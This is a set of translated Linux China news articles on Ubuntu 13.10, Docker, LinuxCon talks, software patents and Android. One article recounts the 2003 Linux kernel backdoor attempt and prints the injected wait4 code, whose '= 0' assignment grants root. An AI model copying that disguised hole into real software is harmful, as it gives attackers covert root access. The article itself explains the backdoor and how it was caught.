Ubuntu 13.10(Saucy Salamander) 将于10月17日发布，但是这个由Canonical开发的操作系统的用户就有疑问了，新的版本似乎并没有添加多少新的特性，有鉴于此，为什么他们要更新呢？

Canonical的主要精力花费在提升品质和改进已有的功能上，而不是巨大的变化。这就意味这最近的两个版本不会有很大的不同，至少在表面上看起来是这样的。

Ubuntu 13.04(Raring Ringtail)，相较而言，令人乏味，但是人们并没有意识到Ubuntu每一次发布的背后都意味着需要完成大量的工作，即使初看起来没有太大的变动。

那么，对于普通用户来说如果新的版本并没有显著的变更，为什么还要升级到 Ubuntu 13.10呢？事实上,初看起来似乎几乎没什么变化，然而许多东西已经升级改善，总会变得更好的(多数情况下是这样)。

当然，最重要的一点，这次的发布所带的新的linux内核3.11.x，是目前为止最新的稳定版本。新内核版本支持更多的设备和硬件组件，更好的电源管理性能，还有很多很多其他方面的改善。

另外，GNOME也升级了。Canonical支持Unity桌面环境，但是仍然使用许多GNOME的软件包。Ubuntu 13.10 (Saucy Salamander) 自带有来自3.8 分支的应用，这些应用都非常棒，对偏好Ubuntu GNOME的用户来说尤其如此。

相对于之前的Lens功能，Smart Scopes仍然有大的改善：更好的集成并且提供更多的定向解答。

安全性设置全面更新了，现在用户可以对系统产生的流量有更多的控制。用户可以停止自己的PC或者laptop和Canonical服务器之间的通信。

Ubuntu 13.10 也为新的软件包格式奠定了基础。迄今，所有Ubuntu应用都是以deb格式提供的。不过用户需要事先安装相关依赖项，或者用户选择自己单独安装。

而使用新的Click包类型，所有的依赖项都可以在包本身内部获得，这就意味着, 只要应用开发者使用的是ubuntu SDK, 用户就不会再碰到任何与当前使用版本不兼容的软件包。

最后，Unity进行了大量改进，理应比任何以前的ubuntu版本工作得更出色。

如果这些缘由仍然不足以说服你升级ubuntu，那就只有等待Ubuntu 14.04 LTS的发行了。不过不保证新的版本会看起来跟Ubuntu 13.10有多么大的不同。

via: http://news.softpedia.com/news/Ubuntu-13-10-vs-Ubuntu-13-04-Reasons-to-Upgrade-389846.shtml

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：l3b2w1 校对：wxy

最近Josh写了一篇文章，讲述2006年Debian Linux中出现的一系列安全bug，探讨了这些所谓bug是否是NSA植入的后门。（最后他作出结论：可能不是）

今天我想讲述的是另外一个事件——2003年某些人试图在Linux内核中植入后门的故事。这次事件很明确，的确有人想植入后门，只是我们不知道此人是谁，而且，也许永远都不会知道了。

时间回到2003年，当时Linux使用一套叫做BitKeeper的系统来存储Linux源代码的主拷贝。如果开发者想要提交一份针对源码的修改，就必须经过一套严格的审核过程，以决定这份修改是否能够合并进主拷贝。每个针对主拷贝的修改都必须附带一段说明，说明当中都包括了一个记录相应审核过程的链接。

但是有些人不喜欢BitKeeper，于是这些开发者们就用另一套叫做CVS的系统（译注：Linus一直拒绝使用CVS，后来不得已使用了BitKeeper，并在因某些原因BitKeeper不再让开源社区免费使用后，花了不到一个月的时间自己开发了GIT的原型，并且投入了使用），维护了一份Linux源代码的拷贝，这样他们就能随时按自己喜欢的方式获取Linux源代码了。CVS中的代码其实就是直接克隆了BitKeeper中的代码。

但是在2003年11月5日的时候，Larry McVoy发现，CVS中的代码拷贝有一处改动并没有包含记录审核的链接。调查显示，这一处改动由陌生人添加，而且从未经过审核，不仅如此，在BitKeeper仓库的主拷贝中，这一处改动竟然压根就不存在。经过进一步调查后，可以明确，显然有人入侵了CVS的服务器并植入了此处改动。

神秘人物究竟做了哪些改动？这才是真正有趣的地方。改动修改的是Linux中一个叫wait4的函数，程序可以使用该函数进行挂起操作，以等待某些事件的触发。神秘人物添加的，就是下面这两行代码：

if ((options == (\_\_WCLONE|\_\_WALL)) && (current->uid = 0))

retval = -EINVAL;

[有C语言编程经验的人也许会问：这两行代码有什么特别的？请接着往下看]

猛地一看，好像这两行代码就是一段正常的错误校验代码，当wait4函数被某种文档中禁止的方式调用时，wait4就返回一个错误代码。但是一个真正认真的程序猿立刻就会发现代码中的问题，注意看在第一行末尾，“= 0”应该是“== 0”才对。是的，“== 0”在这里才是判断当前运行代码的用户ID(current->uid)是否等于0，而“= 0”不但无法判断，反而修改了用户ID的值，即，将其值赋值为0。

将用户ID设置为0，这是一个很严重的问题，因为ID为0的用户正是“root”，而root账户可以在系统中做任何事情，包括访问所有数据、修改任意代码的行为，能够危及到整个系统各个部分的安全。因此，这段代码的影响就是通过特殊手段使得任何调用wait4函数的软件都拥有了root权限。换句话说，这就是一个典型的后门。

客观地说，这一招很漂亮。看起来就像是无关紧要的错误校验，但真实身份却是一个后门。而且它混在其他经过审核的代码中间，几乎规避了所有审核可能会注意到自己的可能性。

但是它终究还是失败了，因为Linux小组有足够强的责任心，注意到了CVS仓库中的这段代码没有经过常规审核。Linux还是略胜一筹。

这是NSA干的吗？只能说有可能。因为有太多拥有技术能力和动机的人有可能实施了此次攻击。那么，到底是谁呢？除非某些人主动承认，又或者发现新的确凿证据，否则，我们将永远不会知道。

via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：tinyeyeser 校对：wxy

Red Hat与开源项目Docker容器技术开发人员组成合作团队，提供一个虚拟机管理器技术(hypervisors)的替代方案。

Linux发行商Red Hat正与虚拟技术公司dotCloud合作，为Fedora社区Linux项目开发一种新型开源容器技术，名为"Docker"。

当今Linux上的虚拟技术主要包括两类，一类是管理器技术(hypervisors)，例如KVM、Xen，另一类为容器技术(container)，例如 Linux LXC项目(LinuX Containers)。Fedora项目领袖Robyn Bergeron向eWeek介绍说，Red Hat已经将容器技术作为OpenShift PaaS解决方案的一部分，为用户提供应用分离解决方案。

Bergeron补充说尽管Docker与容器类型类似，但是Docker并非Red Hat目前正在使用的容器技术。他说，dotCloud和Red Hat两家都希望Docker能在Red Hat家族的Linux系统中运行。双方的合作目前集中在将Docker作为Fedora协同开源开发环境的一部分。

dotCloud创始人同时也是Docker项目发起人Solomon Hykes说，Docker并不是为了用来替代LXC。

“Docker底层使用了LXC，并整合了其它技术”，Hykes说，“Docker是现有的低层面技术的一个集合，但并非只是简单的将它们叠加在一起。”

Hykes介绍，他们的目标是为DevOps世界带来一种开发者和运维人员都能明白并使用的技术。一个Docker容器包含了运行一个特定进程所必需的所有的二进制文件、库文件和配置文件。

他还说，“我们希望将容器用于应用程序部署，而不只是将其看做微型服务器。”

容器技术 vs. 管理器技术

在企业级服务领域，许多系统管理员如今都熟悉虚拟机管理器技术，例如VMware ESX、Xen和KVM。Hykes认为容器技术正成为管理器技术的互补。

“管理器技术一直以来的处境是，它确实是一门伟大的技术，但是行业内却把它当做一把大斧头并试图用它来完成所有的木匠活”，Hykes认为虚拟机管理器作为一种服务类型，相当于提供了一台裸机的硬件，而与之相对的，容器的工作就是为这台主机提供一系列软件。

Red Hat与Docker

作为Red Hat的开发合作伙伴，Hykes说他们的首要任务是确保Docker能够在Red Hat家族的Linux系统上流畅运行。他承认目前Docker 0.6版在包括Fedora之内的Red Hat家族的Linux系统上运行时还有一些问题。下一个发布版本0.7版将针对这些问题重点改进，确保Red Hat家族Linux系统成为Docker部署环境的“一等公民”。

迄今为止，dotCloud已经为它的Docker项目筹集到了1000万美元风投资金。Hykes补充说Docker目前还并没有一款成形的商用产品，他们的首要目标是建立Docker社区生态环境与基础用户群。

“dotCloud的第一阶段是确保Docker足够的普及程度，同时取得IT界大客户的青睐，”Hykes说，“能够与Red Hat合作对我们来说是一个巨大阶段性胜利。”

via: http://www.eweek.com/developer/red-hat-expands-virtualization-options-with-open-source-docker.html

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：Mr小眼儿 校对：wxy

Torvalds对美国政府是否曾要求他在Linux中植入后门的问题进行了回应，他还解释了为何说自己是一名开发者，并向其他开发人员介绍了经验。

Linus Torvalds，于22年前发明了开源操作系统Linux的他，在9月18日，在新奥尔良举办的LinuxCon大会上作主题演讲，并与其他内核开发者一道，共同讨论Linux内核的发展问题。

该日的讨论持续了一个小时之久，座谈小组被问以各种五花八门的问题，健谈的Torvalds均给出了精彩回答。

首先被问到的其中一个问题是，想要切实加入Linux内核开发到底有多难？

Torvalds回答说，“我们有数量惊人的开发者，在有些方面确实比较难上手，但在开源项目的其他大部分方面就要容易的多，因为Linux还有太多太多工作等着我们去做。”

Torvalds指出，从目前参与Linux开发的人数来说，“其实这并不难企及”。

对Torvalds来说，面对硬件的不断创新是内核开发过程中的乐趣之一。他说22年前刚开始开发Linux的时候，那时的硬件和现在很不一样。他期待着20年后硬件能发展的更加超乎想象。

硬件创新的未来

然而Torvalds认为硬件的创新在某些方面已经开始放缓，面对摩尔定律失效的那天，现代工业将如何应对，Torvalds说他对此很感兴趣。在他看来，这其实是个物理问题，就看硅片上的创新能走多远。

“Linux之所以能在手机上运行如此流畅，是因为手机本身的性能一直在不断增长，现在的手机比我当年用来开发Linux的原型机性能强大好几千倍”，Torvalds说，“人们总是乐观地敷衍摩尔定律，但是未来10年内，这将变得非常非常难。”

虚拟化正在成为越来越多硬件社区的趋势，但是Torvalds对此却并不感兴趣。

“我不想与任何跟虚拟化有关的东西沾边，”Torvalds说，“我喜欢直接在硬件上运行；我是个‘实在’人”。

NSA后门

Torvalds还被问到是否美国政府曾要求他在Linux中植入后门。Torvalds的回答很有意思，他嘴里回答“NO”，同时却用力点着头好像在说“Yes”，引来会场听众哈哈大笑。（译注，实际上，他在其后又严肃的补充说了一个No，可以参看本站另外一篇文章：Linux有后门？看Linus Torvalds在LinuxCon大会上怎么说）

如何成为一名真正的开发者

讨论中，Torvalds还解释了为何将开发者作为自己的第一身份。他是如何踏上这条道路的呢？那时，他没钱买Unix，同时他发现，他的高富帅朋友们都在配置牛逼的电脑上玩游戏，自己却只能穷守着台破电脑啥也干不了，于是，屌丝逆袭，他就这么开始学习编程了。

“现实逼着我必须干点什么了，”屌丝Torvalds说。

当Torvalds全身心投入到Linux中时，他说，Linux成为了他生命的中心。

“我觉得没有任何项目能比Linux更让我感兴趣，”Torvalds说，“如果没有了Linux，我无法想象我一片虚无的生命还有什么意义”。

via : http://www.eweek.com/developer/linus-torvalds-talks-linux-development-at-linuxcon.html

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：Mr小眼儿 校对：wxy

这个小组识别危险的专利并且试着还原它们的本来面目。

图片来自：Sean Nguyen

尽管那些“专利蟑螂”发起影响开源软件的诉讼数目与日俱增，但还有一线希望。2011年9月签署了一部法律-《美国发明法案》，它提供了新的途径来阻止未来可能引起诉讼的过于宽泛的软件专利。

今天的 LinuxCon的一个会议中，Linux Defenders 的负责人Andrea Casillas解释了这个组织是如何利用新法律赋予的权利来对抗专利申请。Open Invention Network 的一个项目 Software Freedom Law Center，Linux 基金会以及 Linux Defenders 对每周公布的6000项专利做检查，试图识别出那些对Linux和开源的潜在威胁。然后，这个组织查找一些至少能够废止其中一部分专利申请的先例。

下一步就是协同Linux技术专家编纂防御性公共出版物，虽然它们本身不是专利，但它们描述了一项发明，并放入公开档案以阻止覆含该技术的新专利的批准。这些出版物通常有2-3页的技术描述，美国专利商标局的审查员可以在管理可能会失效的先例或者限制新专利申请的范围时阅读参考。

“我们将与作者、发明者或者开发者携手合作编写这些出版物，使它们更加有效。” Casillas 说。他一直主张 Linux 社区帮助这个小组发现危险专利并寻找先例。

防御性公共出版物是旧的策略，但它将会因为 America Ivents Act 而越来越接近公众的生活。Casillas 解释说：“这是审查人员第一次欢迎公众的互动。任何个人都可以免费递交电子版的关于先例的申请。”

Linux Defenders 已经编纂好了与来自 Microsoft，Apple和其它公司的专利申请有关的防御性公共出版物。概括来说，Casillas 说防御性公共出版物不是要去迫使某家公司放弃某一专利，而是要迫使某家公司缩小它们申请的专利包括的范围。

当被问起 Linux Defenders 能否说出因为这个过程而受限的专利申请的案例时，Casillas 和她的同事们说他们仍然在寻找评估它的有效性的方法。在6到9个月里，他们希望能找到一个工具来跟踪记录专利研究者们在复审中使用防御性公共出版物的情况。

Linux Denfenders 同时也把矛头指向已经通过的专利。但 Casillas 提醒说要推倒已经批准的专利的法律标准非常高。

专利诉讼“能让 Red Hat扫地出门”

昨天 LinuxCon 的一个单独的会议上，Red Hat 的 Fedora 项目经理 Tom Callaway 讨论了开源的法律威胁。

Red Hat 批评了“专利蟑螂”并且采取多种措施保护自己和用户。Callaway 说不能小看这些威胁。“我不是说大话，Red Hat在我们开源产业里不是一个小公司，我们可能是最大的。一个关键专利诉讼的失利可以让 Red Hat在这行干不下去。这就是专利的重要性，也足见在业界它是多么让人闻风丧胆。”

各种可能性中，Red Hat不会被扫地出门的。它有一个保护自己及用户的在法庭上对抗专利“专利蟑螂”的良好跟踪记录。它把保障用户权益、对抗诉讼当做它的软件程序，而且已经建立起了一系列防御专利。

尽管付费的 RHEL 会员资格给了用户额外的保护，Red Hat也正在保证Fedora这个免费的系统远离法律纠纷。它是这么做的：分析所有代码，确保每段代码都使用合适的许可，有时移除或重写有嫌疑的代码。这会导致软件产生负面的结果。“我们在 Fedora 中遇到了很多问题。专利使我们不能按照我们所想要的方式去做事。”Callaway 这么说。

在最近的与 Rackspace 和 Red Hat 有关的案子里，一个叫做 Uniloc 公司想要从 Rackspace 处获得费用，因为后者使用了Red Hat的基于 Linux 的服务器。Uniloc的案子以其败诉告终。法官宣判它的专利声明无效，因为它仅描述了一个相对简单的数学操作。

但是应对这些诉讼很费钱。甚至 Red Hat 有时付专利费避免打官司。

Callaway在过分宽泛的专利面前流露出了挫败感。某些专利是“如此的模糊以至于它们可以指任何东西，”他说，“它们可以被应用到几乎任何地方，并且专利持有者打赌认定你不会去计较。”

帮助专利审查人员识别恶意专利

Casillas告诉我们，那些过分宽泛的专利，正是 Linux Defenders 想要去阻止的。模糊的专利经常能够通过专利申请，部分原因是因为专利审查人员用在每个申请上的时间不会超过20小时。

总的时间是“相当难以置信，它考虑到这个过程所需时间长短以及这个专利发布的重要性。”他说。那20小时“包括了浏览申请，确定它按格式编辑，你的基本合法需求，而且这段时间决定着这个发明的前景。”

专利审查人员用7到8个小时搜索先例，不论是专利形式的还是其它公共可及的技术描述，她说。

通过提交防御性公共出版物，提取标签以使专利审查人员更容易找到，Linux Defenders 希望使美国专利商标局更加起到实际作用。

Casillas 说：“我们不是在增加他们的工作量，而是帮助他们一起完成这些相关出版物”

via: http://arstechnica.com/tech-policy/2013/09/how-linux-defenders-attack-software-patents-before-theyre-approved/

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：boredivan 校对：Caroline

Google的首席开源执行官在LinuxCon大会上说明了为何Android是开源的以及为何开源是Android成功的关键因素

9月16日，新奥尔良，LinuxCon大会，负责开源的Google董事Chris DiBona在主题演讲中发布了一条关键信息：Android是一款开源产品。

Google在开源社区中能够确保不犯错并一直遵守开源授权的要求，DiBona在这其中发挥了关键作用。DiBona在演讲中介绍，早在2005年，从Android发展战略刚刚开始的时候，其平台的核心基础就是要始终保持开源。

2005年，Google面临的困难挑战是如何将它的搜索引擎植入手机。当时，手持设备的市场还很封闭，Google要想进入到手机市场，必须经历一个步履维艰的过程。Google要想确保它的搜索引擎能够轻易部署到每一部手机，在某种程度上，Android就成为了一种尝试。

DiBona说，“我们希望人们在使用手机的时候，能拥有和电脑桌面一样的体验，但当时在开源领域并没有这样的产品”。

Google希望的是，Android只为用户提供手机所必需的基本功能，DiBona说，Google并不愿因为在手机上搞竞价排名或定制服务而和运营商们无休止地讨价还价。

DiBona还说，“手机运营商再也不能靠捆绑销售来竞争了，手机市场必须有一个自由环境。”

DiBona介绍，Android已经成为Google极其成功的一项成就，而且它每年都在变得更好。他还补充说，目前，新的Android设备每天的激活量已经达到130万台。

Linux

从Android利用Linux作为自身平台重要的组成部分开始，它们之间就注定结下不解之缘。2010年，Google的Android代码被从Linux核心中剔除。

直到2012年三月Linux内核3.3发布，Android才最终回到Linux核心代码中。DiBona评论说，他始终认为Linux和Android在一起是个好主意。关于它俩是否应该在一起的争论，这是个很技术的技术问题，涉及到一种叫做WakeLock的省电机制。

争论先放一边，DiBona说，有些人质疑Android是否真的开源，简单一句话就可以证明，屡试不爽。不需要Google的参与甚至许可，任何人都可以在任何设备上安装Android。而正是因为Google在开源许可的授权下开发了Android，以上这一切才能成为事实。

DiBona最后总结时强调，是开源造就了Google的Android，开源作为Android的核心观念，早已根深蒂固。

via: http://www.eweek.com/mobile/google-android-is-open-source-linuxcon.html

本文由 LCTT 原创翻译，Linux中国 荣誉推出

译者：Mr小眼儿 校对：Caroline